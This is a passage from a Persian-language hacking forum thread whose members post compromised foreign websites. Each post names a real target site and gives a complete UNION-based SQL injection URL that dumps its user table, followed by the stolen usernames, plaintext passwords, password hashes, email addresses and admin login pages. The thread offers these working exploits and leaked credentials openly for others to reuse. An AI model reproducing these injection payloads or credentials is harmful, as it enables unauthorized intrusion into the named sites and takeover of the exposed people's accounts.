پرش به


تصویر

دیتابیس سایت های مورد نفوذ قرار گرفته (خارجی)

اختصاصی

 • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
217 پاسخ برای این موضوع

#61 ارسالی 07 مه 2016 - 03:00

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.emefcy.com

لینک اینجکت :

http://www.emefcy.com/news_item.php?ID=-73%27+UNION+SELECT+1,2,3,0x696e6a656374656420427920426c61636b776f6c665f4972616e,5,6,7,8,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28passwordlist%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e2055736572436f6465203a20,userCode,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,userName,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,userPass%29%29%29%29x%29,10,11,12,13,0x204861636b656420427920426c61636b776f6c665f4972616e,15,16,17--+
 UserCode : bfd4e5JHTR&4yhj684EY45*46 Username : emefcy Password : Haeshel7 

موفق باشید./


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#62 ارسالی 07 مه 2016 - 03:02

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.reddragonapparel.com/

لینک اینجکت :

http://www.reddragonapparel.com/news_item.php?id=-3947+UNION+SELECT+1,0x3c666f6e7420636f6c6f723d22626c7565223e3c63656e7465723e3c68313e496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,id,0x3c666f6e7420636f6c6f723d62726f776e3e20557365726e616d65203a20,name,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6,7--+

این سایت دارای بیش از 2 هزار اکانت هستش./

موفق باشید.

دکمه پسندیدم یادتون نره


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#63 ارسالی 07 مه 2016 - 07:09

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

تارگت :

http://www.londonlions.com

سایت باشگاه فوتبال لندن هستش.

لینک اینجکت :

http://www.londonlions.com/londonlions-archive/news_item.php?id=-583%27+UNION+SELECT+1,0x426c61636b776f6c665f4972616e,0x416e6f6e796d6f7573205365637572697479205465616d,0x4972616e6f6e796d6f7573,5,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e204944203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,Username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,Password,0x3c62723e3c68723e%29%29%29%29x%29--+

پسوردش وردپرس هستش چون به وردپرس نفوذ شد :

ID : 193 Username : score Password : $2y$10$dmraYZT35tCimb3qtkPHFeM.jNOsHkhSgCRylqN86rnFvodz8AC5e

ID : 136 Username : blw Password : $2y$10$skh1ZG2Ftxz3OgmVOTCojOzqWR5P9WVXaGij7LE3GnWtkGgCSd.h6

ID : 251 Username : jgold Password : $2y$10$W6kd5j/6RnuaIz52.3KzC.W9hArve8WRxJYHA9sAgHekOyLNBnGPW

ID : 188 Username : danjacobs Password : $2y$10$wKnAntyx0BceFtvtfmKBauPhY/1uUgrascskCgJHcC/lVwWoXp6Sq

ID : 326 Username : jmeltzer Password : $2y$10$rNISAvDXtsXc7AR3GsV7h.vDySMRX6LnCOTnTy/crAzYsHMB7pBWm

ID : 301 Username : markshooter Password : $2y$10$W6e0Adl4Dcf7xZ5Zpft4/u5F/3TTVcaHCVgU.R4ApFJpFA2otCHbG

بقیه یوزر ها در لینک اینجکت ....

 

خب دوستان موفق باشید . پسندیدم هم یادتون نره و اینکه سرورش هم قویه و پروتکل https هستش.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#64 ارسالی 08 مه 2016 - 03:58

Ormazd
+1,723
  OFFLINE
  تاریخ عضویت :
  24 دسامبر 2015
 • ORMAZD
 • Super Moderator
 • 294 ارسال
  Last Visit آوریل 20 2018 01:18
 • Country :
 • Gender : Male

تارگت :

http://www.babel-babel.it/

لینک اینجکت :

http://www.babel-babel.it/single-event.php?id=7%20union%20select%201,2,0x3c666f6e742073697a653d5c22353070785c2220636f6c6f723d5c22677265656e5c223e494e4a4543544544204259204f524d415a44203c2f666f6e743e,4,5,6,7,8,9,10,11,12,13,14,0x7669736974207573203c61207374796c653d5c22636f6c6f723a7265643b5c2220687265663d5c22687474703a2f2f6972616e6f6e796d6f75732e6f72672f63632f5c223e6972616e6f6e796d6f75732e6f72673c2f613e20,16,17,18,group_concat(uname,0x3a,pass,0x3a,name,0x3a,email,0x3a,level,0x3c62723e),20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20orangepix_users--

یوزر ها :

web2:df1730df90d74e138a2984274cd5711f:Benjamin:web2@orangepx.it:1
,app:23e8199a28b8dd361f7e7aa52eb8de7c:Anthony:app@orangepix.it:1
,web:df1730df90d74e138a2984274cd5711f:Fabio:web@orangepix.it:1
,federico.tonin:79df7c362b1fe103d5cba62b3ba5e630:Federico:federico.tonin@orangepix.it:1
,michele.tolu:cb0953bc73497b8b980c30bd85aa1616:MIchele:michele.tolu@orangepix.it:1
,fabrizio.lava:750af3293e9b1e20bb77af41d0aaa50a:Fabrizio:fabrizio.lava@orangepix.it:1
,social:768334d0e179c1bf46ef64195c730592:Maria Adelaide:social@orangepix.it:1

شلش هم در بخش شل ها قرار داده میشه
:x


به خیالشون که این تاج سرشونه تا همیشه
یادشون رفته که اون شاه که به صد مهره نمی باخت
تاج رو از سرش تو میدون لشکر پیاده انداخت
اونکه مارو بازی میده
اونیکه مهره رو چیده
اونیکه نه شاه نه سرباز
نه سیاه...........نه سفیده
از پس پرده نگاه کن


#65 ارسالی 12 مه 2016 - 09:23

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

target :

http://vagaaka.bezen.se

inject :

http://vagaaka.bezen.se/news_item.php?Id=-29+UNION+SELECT+1,0x3c63656e7465723e3c68313e20496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28jos_users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,4,5,6--+

id : 62 Username : admin Password : 458146415e3a167518ac319bb329fea5:2Ie40gKvMo9rpH4lFD6ypLixgtwl4Fr9

G00d Luck


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#66 ارسالی 12 مه 2016 - 09:44

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

target :

http://www.imagesystems.com.mt/

inject :

http://www.imagesystems.com.mt/news_item.php?id=-103+UNION+SELECT+1,NULL,0x696e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28sys_users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29,5--+
id : 10 Username : imagesystems_admin Password : 3fc9ea4d9743a37c8cc5c3399a5e2172
id : 11 Username : test1 Password : e9f9a7c2d4f3ab3f5677776247b4974b
id : 9 Username : preeo Password : e9f9a7c2d4f3ab3f5677776247b4974b 

G()()D LuCk :))


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#67 ارسالی 13 مه 2016 - 02:15

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

target :

http://www.metrolight.com

inject :

http://www.metrolight.com/markets.php?ID=-4%27+UNION+SELECT+1,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28susers%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,suserUsername,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,suserPassword%29%29%29%29x%29,4,5,6,7,8--+
id : 1 Username : aaa Password : bbb
id : 3 Username : daniellac@metrolight.com Password : 14jared
id : 4 Username : prolight@prolight.hu Password : sarkany
id : 5 Username : plesner Password : plesner
id : 6 Username : GiladO Password : 1234 

good luck


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#68 ارسالی 13 مه 2016 - 02:17

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

target :

http://meaghanmcisaac.com/

inject :

http://meaghanmcisaac.com/news_item.php?id=-30+UNION+SELECT+1,2,0x20496e6a656374656420427920426c61636b776f6c665f4972616e,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28users%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e206964203a20,id,0x3c666f6e7420636f6c6f723d626c75653e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d7265643e2050617373776f7264203a20,password%29%29%29%29x%29--+
 id : 1 Username : admin Password : 23482122e83b5aacdd2a6c7cbd53fa78 

login admin :

http://meaghanmcisaac.com/admin/login.php

good luck.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#69 ارسالی 13 مه 2016 - 03:22

  OFFLINE
  تاریخ عضویت :
  23 سپتامبر 2015
 • %100██████████
 • VIP
 • 227 ارسال
  Last Visit یک روز پیش
 • Country :
 • Gender : Male
 • Name : alireza.ebis22
http://www.fair-news.org/archive.php?id=-42+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7+from+tbl_users

user: Fair_News_Cults
password: c6a0f5a45814e4e70fc879c1f0d19eda
adminpage: http://www.fair-news.org/admin

:ph34r:We Are Iranian Aonymous :ph34r:


:angry:IM Alireza.eblis22 :angry:


:)Im white-hat :)


:xLove iran :x


:xLove you :x


#70 ارسالی 13 مه 2016 - 09:53

Danger BoY
+2,705
  OFFLINE
  تاریخ عضویت :
  31 دسامبر 2015
 • Attacker
 • VIP
 • 536 ارسال
  Last Visit 18 ساعت قبل
 • Slogan : My enemies have to sit for my Progress movie review
 • Country :
 • Gender : Male
 • Location : Your Server
 • Name : Unknown

http://www.khchire.c...9 order by 12--

http://www.khchire.c...,8,9,10,11,12--

http://www.khchire.c...,8,9,10,11,12--

http://www.khchire.c...,8,9,10,11,12--

http://www.khchire.c...schema.tables--

 


image.gif
Iranonymous Security Team


++++++++++++++++++++++++++++++++
icon3.png


0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP